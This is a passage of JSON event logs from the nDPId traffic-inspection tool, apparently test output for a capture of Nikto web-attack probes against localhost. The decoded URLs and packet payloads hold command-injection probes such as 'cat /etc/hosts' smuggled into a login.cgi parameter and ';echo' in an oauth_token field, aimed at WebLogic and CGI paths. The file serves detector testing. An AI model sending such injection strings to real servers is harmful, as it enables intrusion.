00838{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":790,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":790,"flow_packet_id":1,"flow_last_seen":1576420278002,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":335,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":335,"pkt_l4_len":301,"thread_ts_msec":1576420278002,"pkt":"AAAAAAAAAAAAAAAACABFAAFBkptAAEAGqRl\/AAABfwAAAcf2H5CPbqvGHGavS4AYAED\/NQAAAQEICp1nABqdZwAaR0VUIC93bHMtd3NhdC9SZWdpc3RyYXRpb25Qb3J0VHlwZVJQQyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb250ZW50LUxlbmd0aDogMzkNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA3MTgzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQp0cmFuc2FjdGlvbl9pZD0xJm9hdXRoX3Rva2VuPSclM2JlY2hvICc="}
01076{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":790,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":790,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420278002,"flow_last_seen":1576420278002,"flow_idle_time":7580000,"flow_min_l4_payload_len":269,"flow_max_l4_payload_len":269,"flow_tot_l4_payload_len":269,"midstream":1,"thread_ts_msec":1576420278002,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51190,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wls-wsat\/RegistrationPortTypeRPC","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007183)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":791,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":791,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420278004,"flow_last_seen":1576420278004,"flow_idle_time":7580000,"flow_min_l4_payload_len":265,"flow_max_l4_payload_len":265,"flow_tot_l4_payload_len":265,"midstream":1,"thread_ts_msec":1576420278004,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51192,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00835{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":791,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":791,"flow_packet_id":1,"flow_last_seen":1576420278004,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":331,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":331,"pkt_l4_len":297,"thread_ts_msec":1576420278004,"pkt":"AAAAAAAAAAAAAAAACABFAAE99rJAAEAGRQZ\/AAABfwAAAcf4H5DOUc\/uMPSpHIAYAED\/MQAAAQEICp1nABudZwAbR0VUIC93bHMtd3NhdC9QYXJ0aWNpcGFudFBvcnRUeXBlIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbnRlbnQtTGVuZ3RoOiAzOQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDcxODQpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCnRyYW5zYWN0aW9uX2lkPTEmb2F1dGhfdG9rZW49JyUzYmVjaG8gJw=="}
01072{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":791,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":791,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420278004,"flow_last_seen":1576420278004,"flow_idle_time":7580000,"flow_min_l4_payload_len":265,"flow_max_l4_payload_len":265,"flow_tot_l4_payload_len":265,"midstream":1,"thread_ts_msec":1576420278004,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51192,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wls-wsat\/ParticipantPortType","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007184)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":792,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":792,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420278005,"flow_last_seen":1576420278005,"flow_idle_time":7580000,"flow_min_l4_payload_len":275,"flow_max_l4_payload_len":275,"flow_tot_l4_payload_len":275,"midstream":1,"thread_ts_msec":1576420278005,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51194,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00846{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":792,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":792,"flow_packet_id":1,"flow_last_seen":1576420278005,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":341,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":341,"pkt_l4_len":307,"thread_ts_msec":1576420278005,"pkt":"AAAAAAAAAAAAAAAACABFAAFH9c9AAEAGRd9\/AAABfwAAAcf6H5CvysyRaoy75oAYAED\/OwAAAQEICp1nAB2dZwAdR0VUIC93bHMtd3NhdC9SZWdpc3RyYXRpb25SZXF1ZXN0ZXJQb3J0VHlwZSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNzE4NSkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkNvbnRlbnQtTGVuZ3RoOiAzOQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCkhvc3Q6IDEyNy4wLjAuMQ0KDQp0cmFuc2FjdGlvbl9pZD0xJm9hdXRoX3Rva2VuPSclM2JlY2hvICc="}
01082{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":792,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":792,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420278005,"flow_last_seen":1576420278005,"flow_idle_time":7580000,"flow_min_l4_payload_len":275,"flow_max_l4_payload_len":275,"flow_tot_l4_payload_len":275,"midstream":1,"thread_ts_msec":1576420278005,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51194,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wls-wsat\/RegistrationRequesterPortType","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007185)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":793,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":793,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420278006,"flow_last_seen":1576420278006,"flow_idle_time":7580000,"flow_min_l4_payload_len":267,"flow_max_l4_payload_len":267,"flow_tot_l4_payload_len":267,"midstream":1,"thread_ts_msec":1576420278006,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51196,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00835{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":793,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":793,"flow_packet_id":1,"flow_last_seen":1576420278006,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":333,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":333,"pkt_l4_len":299,"thread_ts_msec":1576420278006,"pkt":"AAAAAAAAAAAAAAAACABFAAE\/YadAAEAG2g9\/AAABfwAAAcf8H5A46lj5CJ27noAYAED\/MwAAAQEICp1nAB6dZwAeR0VUIC93bHMtd3NhdC9Db29yZGluYXRvclBvcnRUeXBlMTEgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29udGVudC1MZW5ndGg6IDM5DQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZA0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNzE4NikNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0KdHJhbnNhY3Rpb25faWQ9MSZvYXV0aF90b2tlbj0nJTNiZWNobyAn"}
01074{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":793,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":793,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420278006,"flow_last_seen":1576420278006,"flow_idle_time":7580000,"flow_min_l4_payload_len":267,"flow_max_l4_payload_len":267,"flow_tot_l4_payload_len":267,"midstream":1,"thread_ts_msec":1576420278006,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51196,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wls-wsat\/CoordinatorPortType11","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007186)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":794,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":794,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420278008,"flow_last_seen":1576420278008,"flow_idle_time":7580000,"flow_min_l4_payload_len":271,"flow_max_l4_payload_len":271,"flow_tot_l4_payload_len":271,"midstream":1,"thread_ts_msec":1576420278008,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51198,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00842{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":794,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":794,"flow_packet_id":1,"flow_last_seen":1576420278008,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":337,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":337,"pkt_l4_len":303,"thread_ts_msec":1576420278008,"pkt":"AAAAAAAAAAAAAAAACABFAAFD5CdAAEAGV4t\/AAABfwAAAcf+H5BRed18Cunwm4AYAED\/NwAAAQEICp1nACCdZwAfR0VUIC93bHMtd3NhdC9SZWdpc3RyYXRpb25Qb3J0VHlwZVJQQzExIEhUVFAvMS4xDQpDb250ZW50LUxlbmd0aDogMzkNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA3MTg3KQ0KSG9zdDogMTI3LjAuMC4xDQoNCnRyYW5zYWN0aW9uX2lkPTEmb2F1dGhfdG9rZW49JyUzYmVjaG8gJw=="}
01078{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":794,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":794,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420278008,"flow_last_seen":1576420278008,"flow_idle_time":7580000,"flow_min_l4_payload_len":271,"flow_max_l4_payload_len":271,"flow_tot_l4_payload_len":271,"midstream":1,"thread_ts_msec":1576420278008,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51198,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wls-wsat\/RegistrationPortTypeRPC11","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007187)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":795,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":795,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420278010,"flow_last_seen":1576420278010,"flow_idle_time":7580000,"flow_min_l4_payload_len":267,"flow_max_l4_payload_len":267,"flow_tot_l4_payload_len":267,"midstream":1,"thread_ts_msec":1576420278010,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51200,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00835{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":795,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":795,"flow_packet_id":1,"flow_last_seen":1576420278010,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":333,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":333,"pkt_l4_len":299,"thread_ts_msec":1576420278010,"pkt":"AAAAAAAAAAAAAAAACABFAAE\/OK1AAEAGAwp\/AAABfwAAAcgAH5D7EgH2VMq6xIAYAED\/MwAAAQEICp1nACKdZwAiR0VUIC93bHMtd3NhdC9QYXJ0aWNpcGFudFBvcnRUeXBlMTEgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDcxODgpDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZA0KQ29udGVudC1MZW5ndGg6IDM5DQpIb3N0OiAxMjcuMC4wLjENCg0KdHJhbnNhY3Rpb25faWQ9MSZvYXV0aF90b2tlbj0nJTNiZWNobyAn"}
01074{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":795,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":795,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420278010,"flow_last_seen":1576420278010,"flow_idle_time":7580000,"flow_min_l4_payload_len":267,"flow_max_l4_payload_len":267,"flow_tot_l4_payload_len":267,"midstream":1,"thread_ts_msec":1576420278010,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51200,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wls-wsat\/ParticipantPortType11","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007188)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":796,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":796,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420278012,"flow_last_seen":1576420278012,"flow_idle_time":7580000,"flow_min_l4_payload_len":277,"flow_max_l4_payload_len":277,"flow_tot_l4_payload_len":277,"midstream":1,"thread_ts_msec":1576420278012,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51202,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00851{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":796,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":796,"flow_packet_id":1,"flow_last_seen":1576420278012,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":343,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":343,"pkt_l4_len":309,"thread_ts_msec":1576420278012,"pkt":"AAAAAAAAAAAAAAAACABFAAFJWQ5AAEAG4p5\/AAABfwAAAcgCH5Cjm2BUk9d3uYAYAED\/PQAAAQEICp1nACSdZwAkR0VUIC9sb2dpbi5jZ2k\/Y2xpPWFhJTIwYWElMjdjYXQlMjAvZXRjL2hvc3RzIEhUVFAvMS4xDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZA0KQ29udGVudC1MZW5ndGg6IDM5DQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA3MjM0KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCnRyYW5zYWN0aW9uX2lkPTEmb2F1dGhfdG9rZW49JyUzYmVjaG8gJw=="}
01085{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":796,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":796,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420278012,"flow_last_seen":1576420278012,"flow_idle_time":7580000,"flow_min_l4_payload_len":277,"flow_max_l4_payload_len":277,"flow_tot_l4_payload_len":277,"midstream":1,"thread_ts_msec":1576420278012,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51202,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/login.cgi?cli=aa%20aa%27cat%20\/etc\/hosts","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007234)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":797,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420278014,"flow_last_seen":1576420278014,"flow_idle_time":7580000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":257,"flow_tot_l4_payload_len":257,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51204,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00822{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":797,"flow_packet_id":1,"flow_last_seen":1576420278014,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":323,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":323,"pkt_l4_len":289,"thread_ts_msec":1576420278014,"pkt":"AAAAAAAAAAAAAAAACABFAAE1Ck9AAEAGMXJ\/AAABfwAAAcgEH5AitzMTI6HHCIAYAED\/KQAAAQEICp1nACadZwAmR0VUIC9zaGVsbD9jYXQrL2V0Yy9ob3N0cyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNzIzNSkNCkNvbnRlbnQtTGVuZ3RoOiAzOQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCkhvc3Q6IDEyNy4wLjAuMQ0KDQp0cmFuc2FjdGlvbl9pZD0xJm9hdXRoX3Rva2VuPSclM2JlY2hvICc="}
01065{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":797,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420278014,"flow_last_seen":1576420278014,"flow_idle_time":7580000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":257,"flow_tot_l4_payload_len":257,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51204,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/shell?cat+\/etc\/hosts","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007235)"}}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":745,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277895,"flow_last_seen":1576420277895,"flow_idle_time":7580000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51052,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":746,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277896,"flow_last_seen":1576420277896,"flow_idle_time":7580000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":192,"flow_tot_l4_payload_len":192,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51054,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":747,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277898,"flow_last_seen":1576420277898,"flow_idle_time":7580000,"flow_min_l4_payload_len":188,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":188,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51056,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":748,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277899,"flow_last_seen":1576420277899,"flow_idle_time":7580000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":176,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51058,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":749,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277901,"flow_last_seen":1576420277901,"flow_idle_time":7580000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":180,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51060,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":750,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277902,"flow_last_seen":1576420277902,"flow_idle_time":7580000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":180,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51062,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":751,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277903,"flow_last_seen":1576420277903,"flow_idle_time":7580000,"flow_min_l4_payload_len":209,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51064,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":752,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277905,"flow_last_seen":1576420277905,"flow_idle_time":7580000,"flow_min_l4_payload_len":169,"flow_max_l4_payload_len":169,"flow_tot_l4_payload_len":169,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51066,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":753,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277907,"flow_last_seen":1576420277907,"flow_idle_time":7580000,"flow_min_l4_payload_len":173,"flow_max_l4_payload_len":173,"flow_tot_l4_payload_len":173,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51068,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
